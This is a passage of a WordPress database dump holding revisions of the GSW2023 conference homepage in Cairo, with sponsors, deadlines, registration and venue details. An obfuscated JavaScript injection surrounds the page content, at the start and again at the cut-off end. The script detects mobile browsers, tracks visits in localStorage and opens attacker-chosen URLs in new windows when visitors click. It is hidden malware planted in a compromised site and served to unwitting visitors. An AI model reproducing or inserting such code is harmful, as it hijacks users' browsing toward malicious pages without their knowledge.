u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:08:57','2023-05-17 04:08:57','',3066,'https://gsw2023.com/?p=4505',0,'revision','',0),
(4506,1,'2023-05-17 04:14:54','2023-05-17 04:14:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgsw2023-venue%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684296853410{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 